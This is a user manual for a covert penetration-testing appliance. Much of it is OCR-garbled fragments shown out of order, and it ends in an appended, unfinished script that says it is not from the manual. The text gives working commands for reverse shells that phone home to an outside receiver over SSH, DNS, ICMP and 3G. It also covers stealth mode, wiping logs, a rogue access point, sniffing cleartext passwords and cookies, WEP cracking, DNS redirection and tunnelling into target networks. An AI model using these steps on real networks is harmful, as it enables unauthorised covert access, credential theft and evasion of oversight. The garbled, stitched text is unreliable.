
PX Enterprise Pentesting Appliance (PX-EPA) User Manual



1. opt pwnix pwnix scripts Disable_SSH_VPN sh Using the wireless hardware 802 11 wireless Copyright 2012 Pwnie Express 16 Connecting to an open wifi network 1 Set the wireless interface to managed mode iwconfig wlanO mode managed 2 Bring up the interface ifconfig wlanO up 3 Scan for access points in the area iwlist scan 4 Associate with an access point with SSID example on channel 6 iwconfig wlanO essid example iwconfig wlanO channel 6 5 Restart the interface ifconfig wlanO down ifconfig wlanO up 6 Acquire a DHCP address dhclient wland Running Airodump ng amp Kismet 1 Bring down the interface ifconfig wlanO down 2 To launch airodump ng airodump ng wlan0 Note The output of airodump ng can only be viewed within an SSH session no via serial console w When finished press CTRL C to exit 4 To launch Kismet kismet 5 Press ENTER 3 times then TAB then ENTER Copyright 2012 Pwnie Express 17 6 When finished press CTRL C to exit Tip Certain wireless tools may leave the wireless adapter in a mode that s not compatible with other wireless tools It s generally recommended to set the interface to a down state before running most wireless tools ifconfig wlanO down Packet injection amp WEP cracking 1 To run a simple packet injection test execute the following commands This example assumes a WEP enabled access point on channel 6 wi
2. Verizon prepaid mobile broadband plans http www verizonwireless com b2c mobilebroadband page products _prepaidmb Insert the adapter into a Windows computer XP recommended The adapter will load a virtual CD ROM device open this device through My Computer and launch the Broadband2Go Virgin Mobile or VZaccess Verizon installer Copyright 2012 Pwnie Express 22 2 Once the installer completes launch Broadband2Go Virgin Mobile or VZaccess Manager Verizon and complete USB device detection 3 Verify the USB adapter is detected and a 1x data signal is available then click Connect 4 You will be prompted to activate the device and sign up for new service Complete the activation process by following the prompts 5 Once activated confirm you are able to access the Internet using the 3G adapter on Windows 6 Connect the adapter to the Enterprise Appliance s USB port and wait 30 seconds for the adapter driver to load Connecting to the Internet via 3G 1 Call the appropriate pppd dialup script For the unlocked GSM adapter pppd nodetach call e160 amp For the Verizon Virgin Mobile adapters pppd nodetach call l1xevdo amp For the T mobile Rocket 4G adapter pppd nodetach call tmobile amp 2 Assuming a 3G cellular data signal is available the adapter will establish an Internet connection within 10 20 seconds Once connected you will see a solid LED on the top of the adapter 3 Optional
3. SSH Egress Buster ssh pwnie localhost p 3334 SSH over DNS ssh pwnie localhost p 3335 SSH over SSL ssh pwnie localhost p 3336 SSH over 4G GSM ssh pwnie localhost p 3337 SSH over HTTP ssh pwnie localhost p 3338 SSH over ICMP ssh pwnie localhost p 3339 ve ee Enter your Enterprise Appliance pwnie SSH user password and voila You re now remotely connected to the appliance through the reverse shell Proceed to Deploying to target network Standard SSH SSH Egress Buster Note If there s no firewall between the Enterprise Appliance and your shell receiver system be sure the shell receiver system SSH server is listening on the ports you selected for the Standard Reverse SSH and SSH Egress Buster shells in the UI For example if you set port 31337 for Standard Reverse SSH add the line Port 31337 to etc ssh sshd_config then restart SSHd etc init d ssh restart Tip The SSH receiver address can be anonymized using the Tor Hidden Service feature as described here http www securitygeneration com security reverse ssh over tor on the pwnie express Special thanks to Sebastien J of Security Generation for streamlining the SSH receiver setup process and to Lance Honer for his resilient autossh script improvements Deploying to target network Copyright 2012 Pwnie Express 13 P Pwn Plug on SSH receiver f target network Backtrack N Z al Firewall on Firewall in front target network of
4. While enabled the Enterprise Appliance will passively listen on ethO recording HTTP requests user agents cookies OS guesses and clear text passwords to the following logs HTTP requests var log pwnix passive_recon http log OS guesses var log pwnix passive_recon pOf log Clear text passwords var log pwnix passive_recon dsniff log Tip Passive Recon is most effective when the Enterprise Appliance is in NAC Bypass transparent bridging mode or when connected to a switch monitor port or network tap Tip The Passive recon service can also be enabled disabled from the command line as follows To enable service pwnix_passive_recon start update rc d pwnix_passive_recon defaults To disable service pwnix_passive_recon stop update rc d f pwnix_passive_ recon remove Evil AP 1 Ensure the wireless antenna is connected to the appliance Copyright 2012 Pwnie Express 8 ON OS Click Services on the top menu Click Evil AP Enter an SSID for your Evil AP then click Start Evil AP Wireless clients will begin connecting to the AP either automatically via preferred network lists or by direct AP association Tip To view realtime Evil AP activity from the command line tail f var log pwnix evilap log By default the device will function as a standard AP transparently routing all client Internet requests through the wired interface ethO Tip The Evil AP service can also be enabled disab
5. SSH access to your target network http pwnieexpress com pages our tech Tunnels through application aware firewalls amp IPS Supports HTTP proxies SSH VPN amp OpenVPN 13 14 Sends email SMS alerts when SSH tunnels are activated Preloaded with Ubuntu Server 12 04 LTS Metasploit SET Fast Track w3af Kismet Aircrack SSLstrip nmap Hydra dsniff Scapy Ettercap Bluetooth VoIP IPv6 tools amp many more http pwnieexpress com pages our tech Unpingable and no listening ports in stealth mode Base hardware specs QO N O oe he Intel dual core i5 processor with HT 4 cores total at 2 66 GHz 8GB DDR3 memory 60GB internal solid state storage Onboard high gain 802 11 a b g n wireless supporting packet injection amp monitor mode Onboard high gain Bluetooth up to 1000 range supporting packet injection amp monitor mode Onboard 6 band worldwide 4G GSM cellular data Optional support for Zigbee Zwave RFID and Software Defined Radios SDR Optional physical tamper detection using an internal 6 axis accelerometer Getting started D OAO N Connect the provided wireless antenna to the SMA jack on the rear of the appliance Connect the appliance to a power source Connect the onboard Ethernet jack to a local network or switch Power up the appliance oval button on front panel The default appliance IP address is 192 168 9 10 netmask 255 255 255 0 To access the appliance for the first time configure yo
6. SSH receiver 1 Place your shell receiver system behind a public facing firewall 2 Configure the appropriate port forwarders on your firewall 1 Standard Reverse SSH Forward the port selected in the UI to port 22 of your shell receiver 2 SSH over HTTP Forward port 80 to port 80 of your shell receiver system 3 SSH over SSL Forward port 443 to port 443 of your shell receiver system 4 SSH over DNS Forward UDP port 53 to UDP port 53 of your shell receiver system 5 SSH over ICMP Requires your shell receiver system to be directly connected to the Internet no firewall 6 SSH over 3G Forward the port selected in the UI to port 22 of your shell receiver system 7 SSH Egress Buster Forward all ports selected in the UI to port 22 of your shell receiver system 1 In the Pwnix UI Reverse Shells page configure the reverse shells to connect to your firewall s public IP address or DNS name if available 2 Optional Enable Stealth Mode 3 You can now deploy the Enterprise Appliance to your target network The Enterprise Appliance will automatically phone home to your shell receiver system providing encrypted remote access to your target network Tip In some environments you may wish to schedule a nightly reboot of the device to re initiate all connections from the device side This way if some part of the connection process crashes on the device side for example sshd the connection process will
7. filesystem disk usage note your disk usage may vary df h Show CPU details cat proc cpuinfo Show total memory grep MemTotal proc meminfo Show current ethO config ifconfig eth0 Show currently listening TCP UDP services note dhclient won t be present if not using DHCP netstat Lntup Check syslog for errors warnings etc egrep i warn fail crit error bad unable var log messages Show Ruby version ruby v Show Perl version perl v Show Python version python V Copyright 2012 Pwnie Express 32 Additional Pentesting Resources 1 PTES _http Awww pentest standard org index php PTES_Technical_Guidelines 2 Analysis of Metasploit relative to PTES htto Avww tinyurl com msf ptes How to get support 1 Pwnie Express Support Portal http www pwnieexpress com support html 2 Pwnie Express Community Support Forum http forum pwnieexpress com 3 Pwnie Express support e mail support pwnieexpress com Copyright 2012 Pwnie Express 33
8. ports 80 and 443 for the update to succeed 3 The latest stable Pwnix release is downloaded and applied typically 3 5 minutes You will be redirected to the update log 4 The Pwnix version can be viewed under the System Details tab 5 The Pwnix Update log can be view under the System Details tab Appliance Reboot 1 Click Setup on the top menu 2 Under Restart Device click the Reboot Now button 3 The device will reboot immediately Services tab Metasploit RPC 1 Click Services on the top menu 2 Click Metasploit RPC then Enable Metasploit RPC 3 When enabled the Metasploit RPC service can be accessed through the RPC listener Copyright 2012 Pwnie Express Tip The Metasploit RPC service can also be enabled disabled from the command line as follows To enable service pwnix_msfrpcd start update rc d pwnix_msfrpcd defaults To disable service pwnix_msfrpcd stop update rc d f pwnix_msfrpcd remove Tip The Metasploit RPC service can configured in opt pwnix pwnix config services msfrpcd conf LISTEN This option configures the listen address Defaults to 127 0 0 1 USERNAME This option configures the username Defaults to pwnie PASSWORD This option configures the msfrpcd password Defaults to a random string Passive Recon EONS N Click Services on the top menu Click Passive Recon Click Enable to start the passive recon service
9. process closes listening UDP port 68 killall dhclient 2 Randomize your MAC address macchanger r eth 3 Disable ARP replies careful this may affect network connectivity ifconfig ethO arp 1 To disable stealth mode service pwnix_stealth stop update rc d f pwnix_stealth remove Adding unsupported software from the Ubuntu repositories The EPA has been designed as a network appliance and packages and software not installed by a Pwnie Express update are not supported on the device However root access to the device is provided and you can install additional software as needed during testing To do so you will need to enable the Ubuntu repositories Copy the appropriate sources list to the etc apt folder with the following command cp opt pwnix chef cookbooks pwnix base cookbook files default config_files sources list all enabled etc apt sources list apt get update apt get install lt software package gt Note that you should copy the appropriate configuration file back when your installation is completed or the Pwnix update process could break To do so cp opt pwnix chef cookbooks pwnix base cookbook files default config_files sources list all disabled etc apt sources list apt get update Reviewing the OS environment 1 Show Enterprise Appliance software revision Copyright 2012 Pwnie Express 31 grep Release etc motd Show kernel version uname r Show date time date Show
10. the ethO link To set a static IP for ethO enter a new IP address network mask default gateway and primary DNS server and click Apply static IP settings Note After the appliance s IP address is changed reconnect to the UI using the newly assigned IP address To acquire the ethO network settings from a DHCP server instead recommended click Switch to DHCP Note After switching to DHCP you ll need to access the appliance via the virtual default interface 192 168 9 10 or via local keyboard monitor to determine the new IP address assigned by DHCP Once the new DHCP assigned IP address is known reconnect to the UI using the newly assigned IP address Note The virtual default interface 192 168 9 10 can be shut down by running the following command ifdown eth0 1 Copyright 2012 Pwnie Express 6 Clear History amp Logs 1 Click Setup on the top menu 2 Under Clean up Pwnix History and Logs click the Cleanup now button 3 This clears the root user s bash history UI logs and all logs in var log Note The bash history for any currently active root user sessions will be cleared at next logout Tip The cleanup script can also be invoked from the command line as follows opt pwnix pwnix scripts cleanup sh Appliance Updates 1 Click Setup on the top menu 2 Under Update Device click the Update Now button Note The appliance must have Internet access via
11. FANIE CA FTE d Copyright 2012 Rapid Focus Security LLC DBA Pwnie Express Manual revision 03 27 2013 PX Enterprise Pentesting Appliance PX EPA User Manual Note The online version of this manual is maintained here http www pwnieexpress com support html Table of Contents Introduction Legal stuff Appliance Features Base hardware specs Getting started Using the Pwnix Ul Accessing Pwnix UI Setup tab Change Pwnix Password Reverse Shell Key Network Config Clear History amp Logs Appliance Updates Appliance Reboot Services tab Metasploit RPC Passive Recon Evil AP Reverse Shells tab System Details tab Using the reverse shells Reverse shell overview Typical deployment scenario Activating the reverse shells Configuring the Pwnix Shell Receiver VM to receive the reverse shells Configuring Backtrack to receive the reverse shells optional Connecting to the reverse shells Deploying to target network Using SSH port forwarders on Backtrack Example 1 Connecting to remote RDP servers Copyright 2012 Pwnie Express 1 Example 2 Connecting to remote web servers Creating an SSH VPN Sample environment Activating the SSH VPN tunnel Using the wireless hardware 802 11 wireless Connecting to an open wifi network Running Airodump ng amp Kismet Packet injection amp WEP cracking Wireless client de authentication Karmetasploit Bluetooth Using the Bluetooth adap
12. Reset the default route to use the 3G interface ppp0O route del default route add default pppd 4 Test 3G Internet connectivity ping google com traceroute google com 5 To close the 3G connection and restore Internet connectivity on ethO killall s SIGHUP pppd ifdown ethO amp amp ifup eth0d Using the SSH over 3G shell Copyright 2012 Pwnie Express 23 The SSH over 3G reverse shell provides secure out of band access to your Enterprise Appliance wherever a 3G cellular data signal is available While this bypasses your target network s perimeter a reverse shell is still recommended many cell carriers do not assign public IP addresses to 3G data access devices SSH receiver Backtrack 3G NU Z Pwn Plug on target network So St eee 10 Firewall in front of SSH receiver If you haven t done so already complete the reverse shell setup steps see Activating the reverse shells and Configuring the SSH receiver In the Reverse Shells page in UI enable the SSH over 3G GSM shell Configure the shell to connect to your firewall s public IP address or DNS name if available Enter the destination port you d like the Enterprise Appliance to use for the SSH connection Select your 3G adapter from the drop down list Click the Configure all shells button Configure your firewall to forward the port selected in the UI to port 22 on your Backtrack machine On the Backtra
13. VM to receive the reverse shells 1 Option 2 Use Backtrack 5 to receive the reverse shells Configuring Backtrack to receive the reverse shells 3 Test the reverse shells in a lab local LAN to confirm all shells are working as expected see Connecting to the reverse shells 4 Optional Enable Stealth Mode see Maintaining the Appliance gt Stealth Mode 5 Deploy the Enterprise Appliance to your target network and watch your SSH receiver for incoming shells see Deploying to target network i y Pwn Plug on target network Firewall on target network SSH Receiver Backtrack Activating the reverse shells 1 Log into the Pwnix UI 2 Click Reverse Shells on the top menu 3 Use the checkboxes to indicate the reverse shells you d like to enable Tip To best maintain persistent remote access enable all of the reverse shells 4 Enter the SSH shell receiver IP address or DNS name for each selected reverse shell The appliance will connect to this shell receiver system to establish the reverse shell connections Copyright 2012 Pwnie Express 10 5 6 8 Choose how often each reverse shell connection should be attempted By default a shell connection will be attempted every minute recommended To use an HTTP proxy for the SSH over HTTP Tunnel enable the Use HTTP Proxy checkbox and enter the proxy server address and port and optionally proxy server credentials Not
14. both open source and proprietary software Proprietary software is distributed under the terms of the Rapid Focus Security EULA http pwnieexpress com pdfs RFSEULA pdf The following software applications are governed by the bsd 3 clause license http www opensource org licenses bsd 3 clause autossh darkstat dsniff wepbuster wpa_supplicant metasploit The openssl ssleay software applications are governed by the openssl toolkit dual license http www openssl org source license html All other open source software is governed by the GNU General Public License http www gnu org licenses gpl html Appliance Features ee eel ey el Enterprise class wall mountable small form factor enclosure Supports Nessus server Metasploit Express Pro and Cobalt Strike Supports Backtrack Qualys Acunetix nCircle etc as virtual guest machines Hardened per NSA NIST DoD and DISA guidelines including encrypted volumes for pentest results Simple web based administration with Pwnix UI http pwnieexpress com pages our tech Includes most Pwn Plug features http pwnieexpress com pages pwn plug software release 1 1 One click Evil AP stealth mode passive recon and history wipe Fully automated NAC 802 1x RADIUS bypass http pwnieexpress com pages our tech Out of band SSH access over 4G GSM cell networks Copyright 2012 Pwnie Express 3 10 11 12 15 Maintains persistent covert encrypted
15. ck SSH receiver watch for the inbound SSH over 3G connection watch d netstat lntup4 grep 3337 Once the connection appears connect to the Enterprise Appliance as shown ssh pwnie localhost p 3337 Enter your Enterprise Appliance pwnie SSH user password and voila You re now remotely connected to the appliance through the reverse shell over 3G Note The 3G connection will be released and reconnected at the selected retry interval until a reverse SSH tunnel is established Zigbee Travis Using the Goodfet utilities Goodspeed s Zigbee utilities are located in pentest goodfet Simply connect a compatible Zigbee hardware radio running the Goodfet firmware to the Enterprise Appliance via USB and use these utilities for Zigbee wireless auditing Copyright 2012 Pwnie Express 24 For more information see http goodfet sourceforge net Network penetration testing with the PX EPA Footprinting Use whois to identify companies domains ips and other target information whois lt company name gt whois lt ip address gt Use traceroute to identify hosts and path information traceroute lt host gt Use dig to find DNS information dig lt DNS domain name gt Use Fierce to identify additional entities via DNS cd pentest fierce fierce pl dns lt domain gt wide ztstop wildcstop Discovery amp Scanning Use arp scan to identify nearby hosts arp scan local net Use nmap to id
16. e run Start Metasploit with the karma script msfconsole r karma rc Note The module loading is CPU intensive and can take 1 minutes to complete Tip To redirect all DNS queries to the local Metasploit FakeDNS listener iptables t nat A PREROUTING p udp destination port 53 j REDIRECT to port 53 Bluetooth Special thanks to JP Ronin hackfromacave com for getting all of this working for us Using the Bluetooth adapter 1 Confirm the output of the following commands lsusb Bus 001 Device 002 ID 0a12 0001 Cambridge Silicon Radio Ltd Bluetooth Dongle HCI mode hciconfig hci0 Type BR EDR Bus USB BD Address XX XX XX XX XX XX ACL MTU 310 10 SCO MTU 64 8 Copyright 2012 Pwnie Express 19 DOWN RX bytes 466 acl 0 sco 0 events 18 errors 0 TX bytes 73 acl 0 sco 0 commands 17 errors 0 1 Enable the Bluetooth interface and set it to Non Discoverable hciconfig hciO up hciconfig hci0 noscan 2 Toscan for local Bluetooth devices hcitool i hci scan flush info class 1 To ping the address of a local Bluetooth device l2ping i hciO XX XX XX XX XX XX 2 To dump Bluetooth packets hcidump i hciO t X 3 To pair with a local Bluetooth device bluez simple agent hciO0 XX XX XX XX XX XX Accessing additional Bluetooth tools 2test bss bluebugger bluelog h psm_scan rfcomm_scan carwhisperer redfang h ussp push sobexsrv h 4G GSM cellu
17. e The HTTP proxy auth password is stored in clear text in opt pwnix pwnix scripts script_configs Click Configure all shells at the bottom of the page to apply your changes Note The following SSH client config directives etc ssh ssh_config are set on all devices to allow for automation of reverse shell connections Be sure you understand the security implications of these settings before connecting to other SSH servers from the device StrictHostKeyChecking no UserKnownHostsFile dev null Proceed to configure your shell receiver Configuring the Pwnix Shell Receiver VM to receive the reverse shells The Pwnix Shell Receiver virtual machine is the recommended SSH shell receiver This is a locked down Ubuntu 12 04 system pre configured to receive all reverse shells The Enterprise Appliance will connect to this system when initiating the reverse shell connections 1 2 nia Start up the Pwnix Shell Receiver virtual machine if it s not already running From your local workstation open a browser and connect to the Enterprise Appliance UI https appliance_ip_address 8443 Login to the UI when prompted Click Reverse Shells on the top menu Click the Generate Pwnix Shell Reciever config link at the top of the page under step 5 to download the pwnix_receiver sh script to your local workstation Copy the script file pwnix_receiver sh to the Pwnix Shell Receiver virtual machine via scp scp pwnix_receive
18. entify hosts and services nmap A lt ip address or range gt Use the nmap scripts to identify additional information nmap sC lt ip address or range gt Pentesting tools on the PX EPA Configuring and Running Metasploit Using Metasploit via msfconsole The Metasploit binaries msfconsole msfcli etc can be run from any directory Simply type msfconsole run the local Metasploit Console The Metasploit binaries can be found in opt metasploit msf3 Using Metasploit via msfrpcd The metasploit service can by editing the file opt pwnix pwnix config services msfprcd conf Copyright 2012 Pwnie Express 25 nano opt pwnix pwnix config services msfrpcd conf The metasploit service can be started by running service pwnix_msfrpc start To use metasploit from a remote host you will need a front end application We suggest using Backtrack for this Log into Backtrack with your credentials and run the following from the commandline startx cd opt metasploit diagnostic_shell msf3 msfgui Using the credentials provided on the https epa 8443 services msfrpcd page or in opt pwnix pwnix config services msfprcd conf log into MsfGui Tip You may have to open msfgui more than once to get it to prompt you for a server By default it starts an msfrpcd instance on the local Backtrack system Running The Social Engineering Toolkit SET 1 To launch SET type cd pentest set amp amp set Runnin
19. et Login to the Backtrack system and open Firefox Connect to the UI https fappliance_ip_address 8443 Login to the UI when prompted Click Reverse Shells on the top menu Click the Generate Backtrack config link at the top of the page under step 5 to download the backtrack_receiver sh script Save the script file backtrack_receiver sh into the root user s home directory selected by default Open a terminal window and enter the following commands cd chmod x backtrack_receiver sh backtrack_receiver sh The script auto configures and starts the reverse shell listeners on Backtrack When prompted enter the desired certificate information for the stunnel SSL certificate or just press ENTER to accept the defaults Once the auto config script completes you will see Copyright 2012 Pwnie Express 12 Setup Complete Press ENTER to listen for incoming connections 12 Press ENTER to watch for incoming Enterprise Appliance connections Each reverse shell will attempt to connect using the interval you specified in the UI Tip You can list all active device connections at any time by typing netstat lntup4 grep 333 13 Proceed to Connecting to the reverse shells Connecting to the reverse shells 1 Open a terminal window on your shell receiver system and connect to any available listening Enterprise Appliance shell as follows Standard SSH ssh pwnie localhost p 3333
20. g FastTrack 1 To launch Fasttrack type cd pentest fasttrack amp amp fast track py i Note Fasttrack s autopwn is incompatible with Metasploit 3 7 due to removal of sqlite support http dev metasploit com redmine issues 4399 Running the tools in pentest perl pentest asp auditor asp audit pl perl pentest bed bed pl cd pentest cisco auditing tool amp amp CAT perl pentest cisco global exploiter cge pl perl pentest cms explorer cms explorer pl python pentest darkmysqli DarkMySQLi py perl pentest dnsenum dnsenum pl pentest easy creds easy creds sh perl pentest fierce fierce pl Copyright 2012 Pwnie Express 26 python pentest fimap fimap py pentest goohost goohost sh python pentest grabber grabber py pentest Ibd Ibd sh python pentest metagoofil metagoofil py python pentest miranda miranda py h python pentest plecost plecost 0 2 2 9 beta py python pentest sickfuzz sickfuzz py python pentest sipvicious svmap py h perl pentest smtp user enum smtp user enum pl perl pentest snmpcheck snmpcheck 1 8 pl perl pentest snmpenum snmpenum pl python pentest sqlbrute sqlbrute py perl pentest sqlninja sqlninja cd pentest sslstrip amp amp ssistrip py python pentest theharvester theHarvester py python pentest ua tester UAtester py cd pentest voiper amp amp python fuzzer py python pentest waffit wafwOOf py cd pentest
21. lar IMPORTANT Make sure to place the cellular adapter in the back group of 4 USB ports when looking at the device from the back The other USB ports may not provide enough power for the 4G card Copyright 2012 Pwnie Express 20 Using the unlocked GSM adapter The unlocked GSM adapter supports five GSM cell bands HSDPA GSM UMTS EDGE GPRS and is compatible with AT amp T Vodafone Orange and GSM carriers in over 160 countries on GSM carriers in the Americas http en wikipedia org wiki List_of mobile network operators of the Americas GSM carriers in Europe http en wikipedia org wiki List_of mobile network operators of Europe Note Verizon Sprint Virgin Mobile and other CDMA carrier SIMs will not work in the unlocked GSM adapter First obtain a SIM card from the GSM cell provider of your choice In the US SIM cards from AT amp T devices including iPhones are supported Note The mobile service attached to the SIM card must have mobile broadband data service Verify you can access the Internet from your phone using the SIM card before proceeding Slide open the the plastic cover on the GSM adapter Insert your SIM card into the adapter with the notch positioned as shown by the line drawing on the SIM slot with the SIM card contacts facing down Note Some GSM phones including the iPhone4 use a micro SIM instead of a standard sized SIM card To fit these SIM cards into the GSM adapter use the incl
22. led from the command line as follows To enable service pwnix_evil_ap start update rc d pwnix_evil_ap defaults To disable service pwnix_evil_ap stop update rc d f pwnix_evil_ap remove Tip The Metasploit RPC service can configured in opt pwnix pwnix config services evil_ap conf Reverse Shells tab See section Using the reverse shells for details on this feature System Details tab This section displays the appliance s software release level system logs disk usage etc Using the reverse shells 1 Reverse shell overview All Pwnix devices include aggressive reverse tunneling capabilities for persistent remote SSH access Copyright 2012 Pwnie Express 9 2 SSH over HTTP DNS ICMP and other covert tunneling options are available for traversing strict firewall rules web filters amp application aware IPS 3 All tunnels are encrypted via SSH and will maintain access wherever the device has an Internet connection including wired wireless and 3G GSM where available Typical deployment scenario 1 On your staging lab network enable the desired reverse shells see Activating the reverse shells 2 Select the platform you d like to use to receive the reverse shells the shell receiver 1 Option 1 recommended The Pwnix Shell Receiver virtual machine This is a locked down Ubuntu 12 04 system preconfigured to receive all reverse shells see Configuring the Pwnix Shell Receiver
23. nix pwnix scripts encrypted_volume_setup sh Enter a desired passphrase for the encrypted partition Answer yes when prompted these prompts are expected when first encrypting a partition Copy a test file to the encrypted partition echo test gt opt pwnix crypt store test file Unmount the encrypted partition and very the contents of your test file is unreadable umount opt pwnix crypt store cat opt pwnix crypt store test file To re mount the encrypted partition enter your passphrase when prompted mount t ecryptfs opt pwnix crypt store opt pwnix crypt store Using Stealth Mode Important Enabling stealth mode will prevent access direct access to the Enterprise Appliance s SSH server and UI Once stealth mode is enabled and the device is rebooted access to the device can only be obtained through a reverse shell or via locally attached keyboard monitor 1 To enable stealth mode service pwnix_stealth start update rc d pwnix_stealth defaults While enabled stealth mode does the following Disables IPv6 support prevents noisy IPv6 broadcasting Copyright 2012 Pwnie Express 30 Disables ICMP replies won t respond to ping requests Disables the UI closes port 8443 Sets the local SSH server to listen on the loopback address only closes port 22 to the outside Still allows ALL reverse shells to function as expected Oo E 1 For additional stealthiness 1 If using DHCP kill the dhclient
24. ote Desktop client etc Sample environment The steps below assumes the following IP addresses ranges Substitute the addresses ranges for your target and local Backtrack networks where appropriate Copyright 2012 Pwnie Express 15 Target network where the Enterprise Appliance is deployed 172 16 1 0 24 Local network where Backtrack SSH receiver is located 192 168 1 0 24 VPN network 10 1 1 0 30 Backtrack VPN address tunO interface 10 1 1 1 Enterprise Appliance VPN address tunO interface 10 1 1 2 Assumes a reverse shell is currently established and listening on localhost 3333 Standard Reverse SSH Any active reverse shell can be used to carry the VPN tunnel change 3333 where appropriate OE ON Eo NS Activating the SSH VPN tunnel 1 On Backtrack VPN client ssh f w 0 0 localhost p 3333 true Login to the Enterprise Appliance as root when prompted ifconfig tunO 10 1 1 1 10 1 1 2 netmask 255 255 255 252 route add net 172 16 1 0 24 gw 10 1 1 2 2 On the Enterprise Appliance VPN server opt pwnix pwnix scripts Enable_SSH_VPN sh 3 The SSH VPN tunnel should now be active 4 On Backtrack test connectivity to target network through the VPN tunnel ping 10 1 1 2 ping 172 16 1 1 or any remote machine on the target network nmap sP 172 16 1 5 To disable the VPN tunnel on the Backtrack side ifconfig tunO down 6 To disable the VPN tunnel on the Enterprise Appliance side
...package from http://www.tenable.com/products/nessus/nessus-download-agreement

2. Install the Nessus .deb package and start the Nessus server:

    dpkg -i Nessus-5.0.1-ubuntu1110_amd64.deb
    service nessusd start

3. Connect to the Nessus server web UI: https://appliance_IP:8834

4. Proceed through the Nessus server setup wizard.

Deploying virtual machines

Creating a Backtrack 5 VM

1. Download the Backtrack 5 ISO to /opt/pwnix/virtual_machines.

2. For this example we'll assume the ISO file name is BT5R1-GNOME-32.iso.

3. Run the following commands to create a new virtual machine that boots from the BT5 ISO:

    chmod 644 /opt/pwnix/virtual_machines/BT5R1-GNOME-32.iso
    virt-install -n bt5r1 -r 512 \
      --disk path=/opt/pwnix/virtual_machines/bt5.img,bus=virtio,size=6 \
      -c /opt/pwnix/virtual_machines/BT5R1-GNOME-32.iso \
      --accelerate --network network=default,model=virtio \
      --connect qemu:///system --vnc --noautoconsole -v

4. View the current state of the new VM:

    virsh -c qemu:///system list

5. From a remote system with a GUI, install virt-viewer (for example via apt-get or yum), then remotely connect to the Backtrack VM GUI console:

    virt-viewer -c qemu+ssh://pwnie@appliance_IP/system bt5r1

   Note: Remote GUI connections require key-based SSH access to the appliance.

Setting up an encrypted partition

Run the following script to create an encrypted partition at /opt/pwnix/crypt_store:

    /opt/pwnix/pwnix_scripts/encrypted_volume_setup.sh
...pwnie user. The Pwnix UI will restart, then prompt you for the new credentials.

Tip: You can also set the pwnie user's password via the command line as shown:

    passwd pwnie

Reverse Shell Key

1. Click Setup on the top menu.
2. Click Reverse Shell Key.
3. This section shows the current root user SSH key used to establish the reverse shells.
4. Optional: To generate a new key pair for the reverse shells, click Generate.

Tip: If a key pair doesn't already exist, a new one will be automatically generated after enabling one or more reverse shells on the Reverse Shells page.

Network Config

1. Click Setup on the top menu.
2. Click Network Config.
3. The current network settings for the appliance's onboard Ethernet interfaces are displayed under Current Network Settings. By default the appliance ships with the following interfaces:

- eth0: The onboard Ethernet interface, configured for DHCP
- eth0:1: The virtual default interface for initial access, set to 192.168.9.10/24
- wlan0: The onboard 802.11a/b/g/n wireless adapter (DOWN by default)
- virbr0: The default bridging interface for virtual machines

To change the appliance's host name, enter a new hostname and click Change hostname.

Tip: After changing the hostname, log out of any active terminal sessions to update your terminal prompt.

To change the IP configuration for eth0, click
...r.sh pwnie@Pwnix_Shell_Receiver_IP_address

Login to the Pwnix Shell Receiver virtual machine:

    ssh pwnie@Pwnix_Shell_Receiver_IP_address

Enter the following commands:

    chmod +x pwnix_receiver.sh
    sudo ./pwnix_receiver.sh

The script auto-configures and starts the reverse shell listeners on the Pwnix Shell Receiver.

If prompted, enter the desired certificate information for the stunnel SSL certificate, or just press ENTER to accept the defaults.

Once the auto-config script completes you will see "Setup Complete. Press ENTER to listen for incoming connections". Press ENTER to watch for incoming Enterprise Appliance connections. Each reverse shell will attempt to connect using the interval you specified in the UI.

Tip: You can list all active device connections at any time by typing:

    sudo netstat -lntup4 | grep 333

Proceed to "Connecting to the reverse shells".

Configuring Backtrack to receive the reverse shells (optional)

A Backtrack 5 system can also serve as the SSH tunnel receiver. The Enterprise Appliance will connect to this system when initiating the reverse shell connections.

Note: These steps assume you're using Backtrack 5 as your SSH receiver. Older Backtrack distributions may be used, but different steps may apply.

1. Place the Enterprise Appliance and the Backtrack system on the same local network subnet
...start fresh again after the reboot.

Using SSH port forwarders on Backtrack

Example 1: Connecting to remote RDP servers

1. On Backtrack:

    ssh pwnie@localhost -p XXXX -NL 3389:xxx.xxx.xxx.xxx:3389

   where XXXX is the local listening port of an active reverse shell (such as 3333 for standard reverse SSH), and where xxx.xxx.xxx.xxx is the IP address of an RDP target system on the remote network the Enterprise Appliance is physically connected to.

2. Login to the Enterprise Appliance when prompted.

3. Connect to the remote RDP server through the SSH tunnel by using localhost:

    rdesktop localhost

Example 2: Connecting to remote web servers

1. On Backtrack:

    ssh pwnie@localhost -p XXXX -ND 8080

   where XXXX is the local listening port of an active reverse shell (such as 3333 for standard reverse SSH).

2. Login to the Enterprise Appliance when prompted.

3. Open Firefox and configure it to use localhost as a SOCKS proxy on port 8080. The -D option opens a SOCKS listener, not an HTTP proxy, so the setting must go in the SOCKS host field; enable remote DNS through the proxy if you need target-side hostnames to resolve.

4. You can now connect to any web server on the remote network by entering the IP address or URL into Firefox.

Creating an SSH VPN

The OpenSSH server on the Enterprise Appliance supports SSH-based VPN tunnelling through any active reverse shell, allowing transparent (albeit slow) access to your target network from your Backtrack machine. This is mainly useful when the need arises for a GUI-based or third-party pentesting tool such as BurpSuite, Nessus, Rem
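The two port-forwarding examples above are typed by hand each time and accept whatever is pasted into them. The script below is an added example, not part of the Pwnie Express manual, that turns them into functions with input validation, fails loudly if the forward cannot be set up, and extends Example 2 to tools other than Firefox by writing a proxychains configuration for the SOCKS listener. SHELL_PORT defaults to the manual's 3333; the target address, the scanned ports, and the use of ./proxychains.conf in the current directory are assumptions.

```shell
#!/bin/sh
# Added example, not from the Pwnie Express manual: the two forwarders above
# as script functions, with input checks and a proxychains config so tools
# other than Firefox can use the SOCKS listener. SHELL_PORT is the manual's
# reverse-shell port; the target IP and the use of ./proxychains.conf are
# assumptions.
SHELL_PORT=${SHELL_PORT:-3333}

# Return 0 if $1 is a dotted-quad IPv4 address with every octet 0-255.
valid_ipv4() {
    printf '%s' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    old_ifs=$IFS; IFS=.; set -- $1; IFS=$old_ifs
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Return 0 if $1 is a TCP port number (1-65535).
valid_port() {
    case "$1" in ''|*[!0-9]*) return 1 ;; esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Print the -L argument LOCAL:TARGET:REMOTE, or fail on bad input so junk
# never reaches ssh.
local_forward_spec() {
    valid_port "$1" && valid_ipv4 "$2" && valid_port "$3" || return 1
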